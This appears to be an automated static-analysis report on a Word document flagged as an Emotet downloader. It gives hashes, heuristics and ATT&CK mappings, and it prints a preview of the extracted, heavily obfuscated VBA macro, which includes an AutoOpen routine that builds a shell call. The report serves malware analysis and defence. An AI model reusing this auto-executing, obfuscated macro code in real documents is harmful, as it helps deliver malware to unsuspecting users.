Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 cae37eb33bbfef6e…

MALICIOUS

Office (OLE)

Size: 115.2 KB
Created: 2018-09-28 09:00:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: b95761945bc8e52b73064c9cbfdaa488
SHA-1: 277d26788b614afdd4c2815e2bebc9dfe34fa356
SHA-256: cae37eb33bbfef6e1b5cc05d327fb0693f3e8efccb6c53a47bc8951a63e883bc
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. An AutoOpen macro is present, and the critical heuristic that fired indicates a Shell() call within the VBA code. ClamAV also identified the file as Doc.Downloader.Emotet-6883996-0, suggesting it acts as a downloader for the Emotet banking trojan. The macro likely attempts to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6883996-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6883996-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 68039 bytes
SHA-256: 3e68c17b235779a61c2d3e16e550b192108077b0092120c81c1b5400329a8f7b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "DKjcGJwViMraN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim fGrPbm(2)
fGrPbm(0) = InStrRev(sYLrRB + zRipCzoaPWQYaBoEtFJzr + cBTiXza, RoZZfSRr + GARWWPwDpqUqjmGtrYp + kACPYboR) + InStr(CdLfwOu + HzzwsAfKwUrdmVMOX + YjOiv, KiwXR + mCKOPwiTklEitadvFYOkO + YATXTwEm)
fGrPbm(1) = InStr(BAIfXF + sqcOjcQWORYSwJRztRmzvt + jVQiT, VOUKQ + ZcqVaFqqHtLFrhUb + ZGjwcLa) + InStrRev(NMHmrKJa + vpiIoXuQXnpVAWKWz + wtujwlU, HBUjvuz + FQKXJXXRrnzDVRQOHOlaUp + UkaFYRks)
   Dim GYBdi(1)
GYBdi(0) = InStrRev(AtGiXUHT + mUsoqwidCCqvLwhQRwq + mkYrk, XaBjFm + ZWLFAnwuzDYBjvYo + anjim) + InStr(tcchhQ + mlvQdldrZpUZVnhKzifa + tFSWW, LGtKc + UwvzFwqXovirMHKh + jLUKhfJ)
   Dim YjWIH(1)
YjWIH(0) = InStrRev(HiDfCPC + kXUqpidDGqlOhTwUBswHQz + cJRVX, hNXhiqGm + drtBkJShHrDscbBZ + ToZAGFL) + InStrRev(vFtGmFU + HICppzvzpCPFMTDTBdw + EMmsJ, HVJSdjdz + IlWQOsZsbCAEOBlcLC + Butwu) + InStrRev(hEswVKa + WtTQpkHRIThrWPCUWUuwkN + IHtzjRwG, XMRmcBl + qhdtAbFNcvjDvmBIjPv + TzWDjssM) + InStrRev(DQiOsX + bdWzTinSzdmRfaCFCic + VorWUvJ, LUmbU + ZwZtjhJwznpSzumifZ + XqsjVa)
   Dim jRMoL(2)
jRMoL(0) = InStrRev(ihzjN + jrOOwOJsVpKFdGnNPf + NkjiiCh, IGcTRp + lXYqwBrQDrwzHiBiPji + PQCwB) + InStrRev(QbndH + OjrCSzqJAYUOPLDQObhzsb + aVMiaGJm, jPHTGr + hkwFfwZnUhkzbBIMVzNFdQY + JuUqzRth) + InStr(pPEjTp + YFOzDifdUfTmlhsz + hhUNuwwR, PXGzEaKr + RoZCbidTCaqOXtlIThOP + vhHhLW) + InStrRev(fVsIRlNQ + LTZJjIhjjjdDYzzbwIfZu + wPczv, QEGqmz + fwRMCSUIFNpWpfthKREYoj + TtwuCcz)
jRMoL(1) = InStrRev(IhjjiGz + NsbZMLLohbZdfAPiLLMZ + lwtwjLGi, WKujki + PCIiCtDiOjVATPbbSIWUuW + VFizdZ) + InStrRev(JpGuA + TsvkSvTEWQsiNHqci + QFwcJ, VUSXGDb + uNalibNsRbcwLdKcpo + pijCzwZp) + InStr(VvPIni + qjrdIWPvdtzJzkDvYPJ + UNdIHDp, wzGCLZM + kwvHFrwXkjQQPJvtHn + OMMAwQZd) + InStrRev(MZWjNIF + fFvWTpmCiSfJhusXtj + BiRIu, nnqcdhTq + IdWzPGzNzSPiXijrBHvDGqf + wbOEzml)
ZPaMhdQ (KeyString(EanqCmj + zDhdbn + 15 + 18 + 34 + Ttmzv + nlaoXQBW) + qIhQo + pPLfzit + KeyString(cpZpd + zCRMr + 17 + 21 + 39 + wjlRk + mfULKfEK) + GwGksmJ + JzmFtI + czJcsikBh + flODdO + lYUKh + YFTwwiZ)
   Dim cMaQIk(2)
cMaQIk(0) = InStrRev(zllOP + bFrIThwTiSZVooEHJYcLw + JLvwO, hWrqQ + jwGlpwVzrwmNzts + YlSUPK) + InStr(RKCYYwda + JpJnOEEAXUXITlvflWf + DmoXl, ndTjR + WOSLJsTMFPFMiukuAjbPiT + juiOrP) + InStrRev(RSKVCp + jIfwatQFWDAvwoimAiqY + JcRtJ, aBjVn + nBOJULAdiRCXDJjokQQbWw + atSSEYqw) + InStrRev(hEiMjJ + GVGQKnlKXXZrNqSBLNdhEK + fKYjH, pImKjihF + bZdUOMzHcNcoCbGplnPkw + fPAWiIP)
cMaQIk(1) = InStrRev(ktrRzlm + hMUkDDaQcfMojjXwlwFN + Vtkprz, YOLMuL + DsniQvukQOpbzuLiC + YcfwQSk) + InStrRev(LsRuNZs + jpEalKJmMRjASTLD + uKQiDzw, ZCDJVc + rUvGfYCDqQcuOonfowhNEq + PfTjYmU) + InStrRev(ZYOlNbU + rULNPPkrCJGrQHlPKsqZu + VWtaUN, wEbBQD + uSKciHHaDFwnQHAtNDQh + TSDJlHLO) + InStrRev(HjdjNPtA + LkzJLPJiWikOdDqowthVF + iUjzKQQ, iUtwrrBj + WVARXLLUNdPiPvdkM + ZpjUKr)
   Dim wDkVK(1)
wDkVK(0) = InStr(QuKFcOwq + qISCofIJZdYLRmmvUZQM + ipKTBG, jzaMV + bLpUQrsTvzLuVwjmJpw + SQRiUM) + InStrRev(bXsObrVY + rXEuSlHYfiBidUVZEYGbBkX + zELOO, SPYzj + joNaoPtGVzqYkwCKwaYUU + WCGdCshc)
   Dim sBaoQ(1)
sBaoQ(0) = InStrRev(CImGEwa + dXTcvXiDBvKlDBOVcoCF + sVwGJXz, rnXVJU + lOPTRFluiFiibRAqzbtiw + LOotEA) + InStr(RqESbPML + twiPVXiGJQrkSnXFzdFLjK + YbmkQboC, wsROwhNf + lihWpVMokzbGffYAQv + Ezioi)
End Sub


Attribute VB_Name = "oKjNRrOpOYTW"
Function GwGksmJ()
Dim UaYRwN(2)
UaYRwN(0) = InStrRev(ALSBl + fNoJoifMaXZiTrUTLtu + UTjXWwdS, FotHDtV + cVXjipbhRLZkpUBDJ + EiBNhdjQ) + InStrRev(WknRzkzs + wAjHVrRisRNwfQVzMrQsU + JjskD, qADutsp + ihYJoHECcuUIPEUhIZ + GkFfMwod) + InStrRev(ZiKwtMB + ibQHLUvfXIcsktSYoGNwmtG + SKIjalPM, uKRSwFz + zQdVdZtUcdOEWwObBGUjd + RWnPtnuZ) + InStrRev(ppiGjEv + PpoUGrXzZcjqHXtFj + fWOXpj, CZwRjz + hvBPzXwpPowJLUvKSF + HCcXDni)
UaYRwN(1) = InStrRev(iULKhbVj + havWKqvzkmLwwMUbULGVu + zfTtaiSp, LjShS + JGTYNsmBEiFaEVqEbE + sGzNi) + InStrRev(uBTWM + QmmjiZokazLqOQjzzbS + EhwKdm
... (truncated)